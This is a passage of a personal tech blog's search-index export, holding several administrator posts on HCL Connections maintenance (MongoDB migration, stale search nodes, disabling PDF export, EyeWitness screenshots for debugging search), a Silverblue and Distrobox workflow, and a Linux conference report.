compatibility version. This may be due to an unsupported upgrade or downgrade.\u0026#34;} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.218+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;F\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:28595, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Terminating.\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;reason\u0026#34;:\u0026#34;16: Device or resource busy\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.218+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;F\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;-\u0026#34;, \u0026#34;id\u0026#34;:23091, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Fatal assertion\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;msgid\u0026#34;:28595,\u0026#34;file\u0026#34;:\u0026#34;src/mongo/db/storage/wiredtiger/wiredtiger_kv_engine.cpp\u0026#34;,\u0026#34;line\u0026#34;:689}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.218+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;F\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;-\u0026#34;, \u0026#34;id\u0026#34;:23092, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;\\n\\n***aborting after fassert() failure\\n\\n\u0026#34;} Important: Clean Up After Failed Attempts If the script does not terminate properly, don\u0026rsquo;t forget to clean up temporary containers to prevent resource conflicts in subsequent attempts:\ndocker rm mongo-get-host-name Planning Your Migration Before starting the migration process, it\u0026rsquo;s important to ensure that you have:\nMade a backup of your MongoDB data Properly scaled down your Mongo 5 containers Verified that your storage paths are correctly configured Allocated sufficient time for the migration process, as it can take longer for large databases The migration to MongoDB 7 is critical for maintaining compatibility with HCL Connections 8 CR9, and while it may present some challenges, following these steps and troubleshooting tips should help ensure a smooth transition.\n","excerpt":"\u003cp\u003eFor HCL Connections 8 CR9, it is mandatory to update MongoDB to version 7. During my first migrations, I encountered some issues and would like to provide workarounds and additional troubleshooting tips to help others with this process.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/mongodb_5_to_7_migration/","title":"Migrate MongoDB 5 to 7 for HCL Connections 8 CR9 update"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/mongodb/","title":"Mongodb"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/pink/","title":"Pink"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/container/","title":"Container"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/desktop/","title":"Desktop"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/immutable/","title":"Immutable"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/linux/","title":"Linux"},{"body":"In late 2023, I started exploring immutable operating systems, specifically Fedora Silverblue and Bluefin . If you\u0026rsquo;re curious about why I made this switch and want more technical details, check out my Froscon Talk on \u0026lsquo;Next-Gen Desktops\u0026rsquo; or watch the video presentation below.\nWhat\u0026rsquo;s an Immutable OS? Unlike traditional Linux distributions, Silverblue has an immutable core system. This means when you install new software with rpm-ostree, it creates a new layer on top of the base system. These changes require a reboot to activate - a small price to pay for the stability and reliability benefits.\nI\u0026rsquo;ve personalized my setup by creating my own operating system image using scripts from Universal Blue . If you\u0026rsquo;re interested, you can find all the details in my repository and the corresponding GitHub Action . All my essential packages are included in this custom OS image.\nMy Daily Workflow with Distrobox While my core OS contains the essentials, I install most applications via Flathub/Flatpak. For testing packages and doing my daily work, I rely heavily on Distrobox , which lets me run different Linux distributions in containers.\nMy Main Containers I primarily use three containers:\nFedora-based container for daily work with tools like:\nNeoVim Neomutt Difftastic mbsync khal vdirsyncer Kali-based container for basic penetration testing and security research\nUbuntu-based container for tools not available in Fedora:\nSwissbit software for security keys Davmail for fetching emails from Office 365 Some of these tools are exported back to the main OS and can run as Systemd services or scheduled tasks (like mail and calendar synchronization).\nCreating My Containers I build my container images using GitHub Actions in my toolbox repository . Usually, I just need to add package names to the appropriate packages.\u0026lt;os\u0026gt; file (like toolboxes/fedora-toolbox/packages.fedora).\nI define my containers in a distrobox.ini file and create them with:\ndistrobox-assemble create --file ~/distrobox.ini -R --name ubuntu distrobox-assemble create --file ~/distrobox.ini -R --name fedora distrobox-assemble create --file ~/distrobox.ini -R --name kali The Ubuntu and Fedora containers are rootless, so they can\u0026rsquo;t modify the host OS. The Kali container runs as root, which gives it access to physical hardware (necessary for network traces and similar tasks).\nTo make accessing my containers easier, I\u0026rsquo;ve set up these aliases in my .bashrc:\nalias fedora=\u0026#39;distrobox enter fedora\u0026#39; alias kali=\u0026#39;distrobox enter --root kali\u0026#39; alias ubuntu=\u0026#39;distrobox enter ubuntu\u0026#39; My typical workflow starts with tmux, where I create additional panes and windows for different shells as needed.\nInstalling New Software Since installing packages in the core Silverblue image always requires a reboot, I normally install software in one of my Distrobox containers using dnf or apt.\nIf I find myself using a tool regularly, I\u0026rsquo;ll update the toolbox image (by editing the containerfile or packages.\u0026lt;os\u0026gt; file). For tools I only need temporarily, they\u0026rsquo;ll disappear the next time I run distrobox-assemble. This approach keeps my environment much cleaner than my previous \u0026ldquo;normal\u0026rdquo; desktop installations.\nRunning Container Software with Systemd These containers work just like normal shells - no need to know anything about container technology. I can export binaries from the containers for use in the host system.\nIn my distrobox.ini, I define which programs to export:\n[fedora] ... exported_bins=\u0026#34;/usr/bin/nvim /usr/bin/mbsync /usr/bin/difft /usr/bin/vdirsyncer /usr/local/bin/maestral /usr/bin/flameshot /usr/bin/syncthing\u0026#34; exported_bins_path=\u0026#34;/var/home/stoeps/.local/bin\u0026#34; ... This creates executable shell scripts in ~/.local/bin that I can run from my default Silverblue shell (and in Systemd) or from another container. Here\u0026rsquo;s an example of such a script for Syncthing:\n#!/bin/sh # distrobox_binary # name: fedora if [ -z \u0026#34;${CONTAINER_ID}\u0026#34; ]; then exec \u0026#34;/usr/bin/distrobox-enter\u0026#34; -n fedora -- \u0026#39;/usr/bin/syncthing\u0026#39; \u0026#34;$@\u0026#34; elif [ -n \u0026#34;${CONTAINER_ID}\u0026#34; ] \u0026amp;\u0026amp; [ \u0026#34;${CONTAINER_ID}\u0026#34; != \u0026#34;fedora\u0026#34; ]; then exec distrobox-host-exec \u0026#39;/var/home/stoeps/.local/bin/syncthing\u0026#39; \u0026#34;$@\u0026#34; else exec \u0026#39;/usr/bin/syncthing\u0026#39; \u0026#34;$@\u0026#34; fi Since ~/.local/bin is in my $PATH, I can run all these scripts directly from my shell. The script checks whether I\u0026rsquo;m running it from inside the Fedora container, from another container, or from the host system, and routes the execution accordingly.\nI can even run these exported applications as systemd services. Here\u0026rsquo;s my systemd definition for Syncthing in ~/.local/systemd/user/syncthing.service:\n[Unit] Description=Syncthing - Open Source Continuous File Synchronization Documentation=man:syncthing(1) StartLimitIntervalSec=60 StartLimitBurst=4 [Service] ExecStart=/var/home/stoeps/.local/bin/syncthing serve --no-browser --no-restart --logflags=0 Restart=on-failure RestartSec=1 SuccessExitStatus=3 4 RestartForceExitStatus=3 4 # Hardening SystemCallArchitectures=native MemoryDenyWriteExecute=true NoNewPrivileges=true [Install] WantedBy=default.target This way, Syncthing runs automatically with my login, despite being installed inside a container!\nCreating Desktop Entries for Container Applications Another neat trick I use is creating desktop files for GUI applications running in my containers. This allows me to launch these applications directly from my desktop environment (Gnome or KDE) just like regular applications.\nI create .desktop files in ~/.local/share/applications/. Here\u0026rsquo;s an example for Davmail from my Ubuntu container:\n[Desktop Entry] Comment=Access m365 mail and calendar Exec=distrobox-enter -n ubuntu -- bash -cl \u0026#34;/home/stoeps/.local/bin/davmail\u0026#34; GenericName=Davmail Name[en_US]=Davmail Name=Davmail Icon=/var/home/stoeps/Pictures/davmail.png Path=/var/home/stoeps StartupNotify=true Terminal=false Type=Application Version=1.0 The key part is the Exec= line, which uses distrobox-enter to run the application inside the appropriate container.\nAfter adding or modifying desktop files, I update the application database with:\nupdate-desktop-database -v ${HOME}/.local/share/applications/ This ensures the new application appears in my desktop environment\u0026rsquo;s application menu. Now I can launch container-based applications with a simple click, just like any native application!\nManage the services and desktop files To reuse these service and desktop definitions, I added them to my chezmoi dotfile repository . At Chemnitzer Linuxtage 2025, I made a talk to start with Chezmoi Your browser does not support this, go to the presentation directly: [media.ccc.de](https://media.ccc.de/v/clt24-214-dokumentation-als-code-mit-ansible-und-asciidoctor) Final Thoughts Switching to an immutable OS with containers has made my computing environment more reliable and clean. The separation between core system and applications helps prevent dependency conflicts, and the container approach lets me experiment freely without worrying about breaking my system. Plus, rebuilding containers regularly helps avoid the cruft that tends to accumulate in traditional installations.\nThe combination of exported binaries, systemd services, and desktop entries makes the containerized applications feel completely native - I get all the benefits of isolation without sacrificing convenience.\nIf you\u0026rsquo;re considering a similar setup or have questions about my workflow, feel free to reach out!\n","excerpt":"\u003cp\u003eIn late 2023, I started exploring immutable operating systems, specifically \u003ca href=\"https://fedoraproject.org/atomic-desktops/silverblue/\" target=\"_blank\"\u003eFedora Silverblue \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://bluefin.io\" target=\"_blank\"\u003eBluefin \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. If you\u0026rsquo;re curious about why I made this switch and want more technical details, check out my \u003ca href=\"https://share.stoeps.de/2024-froscon-ublue.html\" target=\"_blank\"\u003eFroscon Talk on \u0026lsquo;Next-Gen Desktops\u0026rsquo; \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n or watch the video presentation below.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/my_immutable_desktop_workflow_with_fedora_silverblue_and_distrobox/","title":"My Immutable Desktop Workflow with Fedora Silverblue and Distrobox"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/opensource/","title":"Opensource"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/chemnitzer-linuxtage/","title":"Chemnitzer Linuxtage"},{"body":"I attended Chemnitzer Linuxtage 2025 from Friday, March 21st to Sunday, March 23rd. It was my second time at the event, and I enjoyed it even more than last year. This time, approximately 3,500 people attended in person, with up to 250 parallel viewers joining the live streaming of lectures. You can find more details in the official blog post .\nLive Talks I had the opportunity to attend several fascinating talks in person:\nOpenSSH: Das neue Zeug - A deep dive into the latest features and developments in OpenSSH, highlighting security improvements and new functionality.\nLet\u0026rsquo;s Encrypt: Zertifikate für Intranet Server - This session explored how to implement Let\u0026rsquo;s Encrypt certificates for internal servers, a topic particularly relevant for those managing corporate networks.\nKeycloak: FAQ zu Ausfallsicherheit und Absicherung - An informative session addressing common questions about Keycloak\u0026rsquo;s reliability and security features, essential knowledge for implementing robust authentication systems.\nIm Maschinenraum von Kubernetes: Operator-Bau mit Ansible - A practical demonstration of building Kubernetes operators using Ansible, offering insights into automating complex operations within Kubernetes environments.\nFragekultur by Leyrer, it looks like the video recording did not work, but the content was highlighting and I hope we hear an extended version in a future event.\nRecorded Sessions In addition to the live talks, I caught up with several recorded sessions on media.ccc.de:\nKleine Bash-Tricks - This session introduced various Bash shortcuts and techniques. One highlight was learning about Alt+., which recalls the last parameter from the previous command—for example, after running ls /somepath/file, you can type rm followed by Alt+. to quickly add the path and filename.\nPimp Your Shell - A comprehensive overview of shell customization options to enhance productivity and user experience.\n24 Monate Immutable Desktop: Ein Erfahrungsbericht - Having used immutable desktops for about 18 months myself, I was particularly interested in the speaker\u0026rsquo;s experiences and perspectives on this approach to desktop management.\nInfrastruktur und Security Tests - A highly informative session that provided numerous ideas for improving infrastructure testing. I\u0026rsquo;m especially eager to explore testinfra and Ansible assertions based on the insights shared.\nGood Practices für Ansible Inventories und Inventar-Daten - An excellent presentation by Henning. I\u0026rsquo;m looking forward to his follow-up talk, which is scheduled for FrOSCon 2025 in August.\nMy Contribution I also had the privilege of presenting a talk titled Effiziente Dotfile-Verwaltung: chezmoi im Einsatz about chezmoi , a tool for managing dotfiles across multiple machines. The audience engagement was encouraging, and I received valuable feedback that will inform my future explorations of the tool.\nConclusion Chemnitzer Linuxtage 2025 was an enriching experience that exceeded my expectations. The event offered a perfect blend of technical depth and community engagement, providing both practical knowledge and networking opportunities. The diversity of topics covered—from shell optimization to infrastructure security—reflected the vibrant ecosystem of open-source technologies.\nAs I implement some of the techniques and tools I learned about, I\u0026rsquo;m already looking forward to returning next year and perhaps contributing more to this wonderful community event.\n","excerpt":"\u003cp\u003eI attended \u003ca href=\"https://chemnitzer.linux-tage.de/2025\" target=\"_blank\"\u003eChemnitzer Linuxtage 2025 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n from Friday, March 21st to Sunday, March 23rd. It was my second time at the event, and I enjoyed it even more than last year. This time, approximately 3,500 people attended in person, with up to 250 parallel viewers joining the live streaming of lectures. You can find more details \u003ca href=\"https://chemnitzer.linux-tage.de/2025/en/presse/mitteilungen/resuemee\" target=\"_blank\"\u003ein the official blog post \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/chemnitzer-linuxtage-2025/","title":"Chemnitzer Linuxtage 2025"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/conference/","title":"Conference"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/dotfiles-management/","title":"Dotfiles Management"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/linux-community/","title":"Linux Community"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/open-source/","title":"Open-Source"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/homepage/","title":"Homepage"},{"body":"The last weeks I had twice the issue of a huge homepage database with HCL Connections. Both systems weren\u0026rsquo;t installed by me, but I reviewed them.\nSo I know this issues quite well since I faced it the first time years ago. This always happens when you migrate Connections environments side-by-side, and you forget to remove the old search nodes.\nsr_index_docs is used to make all search nodes indexing newly upload files. When each search node has indexed the file, the entry gets removed from the database. As the old nodes are no longer running, they can\u0026rsquo;t index, and so these entries never get deleted.\nIn larger environments the table grows to millions of documents and the database size grows from some GB into the hundreds of GB. You see this growth mainly during database backup, or when you want to move the data to a new machine. So often nobody recognizes the huge waste of space.\nThe documents in sr_index_docs disappear as soon as the old search node entries get deleted.\nRun wsadmin.sh from Dmgr01/bin directory:\nexecfile(\u0026#34;searchAdmin.py\u0026#34;) SearchService.listIndexingNodes() This will show you a list of search nodes:\nYou can identify the old nodes on the timestamp of the Last crawl version, or with the Node \u0026amp; Server name. Now run the following command with the old search node names:\nSearchService.removeIndexingNode(\u0026#34;Node01:cluster1_server1\u0026#34;) There are two knowledge base entries describing these phenomena, but they are a bit short and links / solutions are missing.\nSR_INDEX_DOCS table in the Homepage database grows unexpectedly Connections Out of Service Node Causes Size Increase in HOMEPAGE.SR INDEX_DOCS Table ","excerpt":"\u003cp\u003eThe last weeks I had twice the issue of a huge homepage database with HCL Connections. Both systems weren\u0026rsquo;t installed by me, but I reviewed them.\u003c/p\u003e\n\u003cp\u003eSo I know this issues quite well since I faced it the first time years ago.\nThis always happens when you migrate Connections environments side-by-side, and you forget to remove the old search nodes.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/growing_srindexdocs_table/","title":"Indefinitely growing homepage.sr_index_docs table and forgotten search nodes"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/index/","title":"Index"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/search/","title":"Search"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sr_index_docs/","title":"Sr_index_docs"},{"body":"You can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\nChemnitzer Linuxtage \u0026ndash; https://chemnitzer.linux-tage.de/ Effiziente Dotfile Verwaltung mit Chezmoi Dotfiles sind essenziell für die Anpassung und Automatisierung von Linux-Systemen, doch ihre Verwaltung kann schnell unübersichtlich werden. Chezmoi revolutioniert diesen Prozess, indem es eine sichere, konsistente und portabel synchronisierte Lösung bietet. Der Vortrag zeigt, wie Chezmoi Dotfiles zentralisiert, Änderungen nachvollziehbar macht und gleichzeitig den Schutz sensibler Daten wie SSH-Keys gewährleistet. Anhand von Praxisbeispielen wird erklärt, wie Chezmoi nahtlos in bestehende Workflows integriert werden kann, um Systeme schnell und zuverlässig zu konfigurieren – egal ob lokal oder remote. Dieser Vortrag ist ein Muss für alle, die ihre Dotfiles effizienter und sicherer managen möchten.\nEffiziente Dotfile Verwaltung - Chezmoi im Einsatz Effiziente Dotfile Verwaltung - Chezmoi im Einsatz Your browser does not support this, go to the presentation directly: [media.ccc.de](https://media.ccc.de/v/clt24-214-dokumentation-als-code-mit-ansible-und-asciidoctor) ","excerpt":"\u003cp\u003eYou can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\u003c/p\u003e","ref":"https://stoeps.de/speaking/2025/","title":"Talks 2025"},{"body":"I had some issues with PDF export functionality in HCL Connections the last weeks.\nThe server became unresponsive multiple times due to high load from PDF exports. To quickly address the issue, the simplest solution is to disable the PDF export feature by configuring the icxt.pdfexport.access.requiredrole property in the Resource Environment Entries.\nIn the past I used CSS to hide the PDF button, but users could still call the API or use the browser developer tools to display the button temporarily.\nThe ICXT documentation for PDF Export shows this:\nName Description Default icxt.pdfexport.access.requiredrole Specifies the required access role a user must suffice in order to leverage the PDF Export feature. Valid roles are PDFExport+ItemViewer, PDFExport+ItemEditor and PDFExport+ItemOwner. The roles are calculated based on the HCL Connections content the user wants to execute PDFExport functionality for. PDFExport+ItemEditor So I always thought only these three possible strings are allowed, but when you use any other string, the PDF export does not show up any more. So using stoeps for example disables the feature, or better does not display the PDF buttons any more.\nThen start and stop the IC360_core application.\nNow when you open a Wiki or Blog, then the PDF button is gone:\nDefault:\nDisabled:\n","excerpt":"\u003cp\u003eI had some issues with PDF export functionality in HCL Connections the last weeks.\u003c/p\u003e\n\u003cp\u003eThe server became unresponsive multiple times due to high load from PDF exports. To quickly address the issue, the simplest solution is to disable the PDF export feature by configuring the \u003ccode\u003eicxt.pdfexport.access.requiredrole\u003c/code\u003e property in the Resource Environment Entries.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/disable_pdf_export_in_hcxt/","title":"Disable PDF Export in HCL Connections 8"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcxt/","title":"Hcxt"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcxt/","title":"Hcxt,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ic360/","title":"Ic360"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ic360/","title":"Ic360,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/icxt/","title":"Icxt"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/icxt/","title":"Icxt,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/","title":"Keywords"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/pdf/","title":"Pdf"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/pdfexport/","title":"Pdfexport,"},{"body":"This week, I investigated an issue with the advanced profiles search in HCL Connections. I had a system which did not show any results in the advanced search for the department number of Connections profiles.\nHCL support tried for three months to reproduce the issue, and the users missed the option to search for their teammates with the advanced profiles search.\nTL;DR I started creating entries in the profiles\u0026rsquo; database in the table empinst.employee. First I created the department name, which did not work in the other system. To be sure that it is not dependent on a broken index, I recreated the index in my demo system.\nThe result was that none of my entries were found in the advanced search.\nI used a deptNumber like HR/TEAM-SOUTH1, my first thought was an issue with the characters / or -, so I created entries without them. Still, none of the departments showed up.\nThen I thought the length of the used string could be the problem, so I added the deptNumber: test to two of the profiles. After recreating the index one more time, a search for test returned one result. To make it short, I made a typo and created one entry with capital T.\nAutomate the process During the tests, I created plenty of strings with different length and spelling. During some CTF, I worked with Eyewhitness to automate screenshots of web URLs.\nJust install Eyewhitness (needs Selenium and Python3) in a container or a local machine, like explained in the repository. It\u0026rsquo;s well documented, just follow the README.\nSo I created the URLs for all used deptNumbers in my profiles database and wrote them to a text file.\nselect unique(PROF_DEPARTMENT_NUMBER)) FROM EMPINST.EMPLOYEE e WHERE PROF_DEPARTMENT_NUMBER != \u0026#39;\u0026#39;; The URL used in the advanced search was https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;displayName=\u0026amp;preferredFirstName=\u0026amp;preferredLastName=\u0026amp;profileTags=\u0026amp;jobResp=\u0026amp;description=\u0026amp;experience=\u0026amp;countryDisplayValue=\u0026amp;email=\u0026amp;telephoneNumber=\u0026amp;deptNumber=SEARCHTERM\nSo I merged the results and the URL to get a list with different URLs and search terms. I tested and found that empty search keywords can be removed. My list of URLs looked like this, and I stored it in urls.txt:\nhttps://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=2 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=3a https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=HR/TEAM-SOUTH1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=HR/TEAMSOUTH1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=HRTEAM-SOUTH1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=HRTEAMSOUTH1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=PQRSTUV https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=Test https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=XYZ https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=a https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=abcdefgh https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=bc https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=def https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=ghij https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=ijklmno https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=klmno https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=pqrstu https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=test https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=vwxyzab Now we can use this list to run Eyewhitness and create the screenshots:\ncd Eyewhitness/Python/bin ./EyeWitness.py -f urls.txt --delay 5 --web --no-dns --results 25 --width 1920 --height 1080 We see that Eyewhitness calls the URLs and creates a subfolder with the actual date and time with a collection of URLs and screenshots:\n################################################################################ # EyeWitness # ################################################################################ # Red Siege Information Security - https://www.redsiege.com # ################################################################################ Starting Web Requests (20 Hosts) Attempting to screenshot https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=1 [*] Sleeping for 5 seconds before taking the screenshot Attempting to screenshot https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=2 [*] Sleeping for 5 seconds before taking the screenshot Attempting to screenshot https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=3a [*] Sleeping for 5 seconds before taking the screenshots ... [*] Completed 15 out of 20 services Finished in 33.67001438140869 seconds [*] Done! Report written in the /var/home/stoeps/itsec/EyeWitness/Python/2024-11-03_185026 folder! Would you like to open the report now? [Y/n] I started a local webserver and opened the URL:\npython3 -m http.server Opening the reports.html shows a table with the used URL and the actual screenshot:\nSo we can scroll through all the results and quickly see which searches show results and which do not. I found that all deptNumber entries which contain a capital do not show results, but numbers and lowercase entries work fine.\nThe next time I would even create the database entries for deptNumber via SQL or scripting, then it is even faster.\nEyewhitness can also be used to check URLs regularly and compare screenshots over time. So run a set of URLs before an update and store the results. Then make your changes and run Eyewhitness again. Put the results side by side and compare the result. Or keep both result sets to have proof that everything looked the same after the update.\nAuthentication with Eyewhitness I made it easy in this case and opened profiles for anonymous access, so I could use the URL list and didn\u0026rsquo;t need any login.\nIf you require authentication, you can copy the LtpaToken2 from one of your authenticated requests and add it with --cookies LtpaToken2=... to the Eyewhitness call. Or you automate this step and get the cookie via curl on the console.\n","excerpt":"\u003cp\u003eThis week, I investigated an issue with the advanced profiles search in HCL Connections. I had a system which did not show any results in the advanced search for the department number of Connections profiles.\u003c/p\u003e\n\u003cp\u003eHCL support tried for three months to reproduce the issue, and the users missed the option to search for their teammates with the advanced profiles search.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/eyewhitness-to-automate-screenshots/","title":"Automate screenshots of web pages with Eyewhitness"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/automation/","title":"Automation"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/eyewhitness/","title":"Eyewhitness"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/screenshots/","title":"Screenshots"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/screenshots/","title":"Screenshots,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/support/","title":"Support,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/changedetection/","title":"Changedetection"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/changedetection/","title":"Changedetection,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/mastodon/","title":"Mastodon"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/mastodon/","title":"Mastodon,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tools_i_use/","title":"Tools_i_use,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tools-i-use/","title":"Tools-I-Use"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/toot/","title":"Toot"},{"body":"In the last blogpost I showed how I use an instance of changedetection.io on a Raspberry Pi to monitor and track changes in a ServiceNow portal.\nMeanwhile, I tweaked this a bit more and found a way how I can monitor the RSS Feed of my blog to post a toot on mastodon when I created a new blog post.\nHere are the steps to get the information from the RSS feed. I run this once or twice a day and just grep the latest entry of the RSS feed because I normally do not post more than once a week. So this should be fine for my personal blog.\nAdd mastodon notification First we have to register a new application in the Mastodon instance.\nClick on Development \u0026gt; New application:\nApplication name changedetection (free to select) Application website http://192,168.1.210:5000 (URL of my instance) Redirect URL urn:ietf:wg:oauth:2.0:oob Scopes read:accounts, write:media, write:statuses More details can be found here. Save the document and open it again, Mastodon present you Client key, Client secret and Your access token. For Apprise you need the access token.\nGet the RSS feed and get the latest title and link with xpath The RSS feed looks like this:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34; standalone=\u0026#34;yes\u0026#34;?\u0026gt; \u0026lt;rss version=\u0026#34;2.0\u0026#34; xmlns:atom=\u0026#34;http://www.w3.org/2005/Atom\u0026#34;\u0026gt; \u0026lt;channel\u0026gt; \u0026lt;title\u0026gt;Have you closed all Windows - stories from stoeps on stoeps\u0026lt;/title\u0026gt; ... \u0026lt;item\u0026gt; \u0026lt;title\u0026gt;Toot new blogposts with changedetection.io\u0026lt;/title\u0026gt; \u0026lt;link\u0026gt;http://localhost:1313/posts/2024/toot-new-blogposts/\u0026lt;/link\u0026gt; \u0026lt;pubDate\u0026gt;Fri, 13 Sep 2024 16:00:00 +0200\u0026lt;/pubDate\u0026gt; \u0026lt;guid\u0026gt;http://localhost:1313/posts/2024/toot-new-blogposts/\u0026lt;/guid\u0026gt; \u0026lt;description\u0026gt;\u0026amp;lt;p\u0026amp;gt;In \u0026amp;lt;a href=\u0026amp;#34;http://localhost:1313/posts/2024/changedetection/\u0026amp;#34;\u0026amp;gt;the last blogpost\u0026amp;lt;/a\u0026amp;gt; I showed how I use a instance of changedetection.io on a Rasperry Pi to monitor and track changes in a Service Now portal.\u0026amp;lt;/p\u0026amp;gt; \u0026amp;lt;p\u0026amp;gt;In the meantime I tweaked this a bit more and found a way how I can monitor the \u0026amp;lt;a href=\u0026amp;#34;https://stoeps.de/index.xml\u0026amp;#34; target=\u0026amp;#34;_blank\u0026amp;#34;\u0026amp;gt;RSS Feed \u0026amp;lt;i class=\u0026amp;#34;las la-external-link-alt la-xs\u0026amp;#34;\u0026amp;gt;\u0026amp;lt;/i\u0026amp;gt;\u0026amp;lt;/a\u0026amp;gt; of my blog to post a toot on mastodon when I created a new blog post.\u0026amp;lt;/p\u0026amp;gt;\u0026lt;/description\u0026gt; \u0026lt;/item\u0026gt; \u0026lt;item\u0026gt; ... I want to create a toot with the post title, link and summary (description). Using the Basic fast Plaintext/HTTP Client is sufficient here.\nThe steps \u0026ldquo;Browser Steps\u0026rdquo; and \u0026ldquo;Visual Filter Selector\u0026rdquo; can be ignored.\nIn \u0026ldquo;Filters \u0026amp; 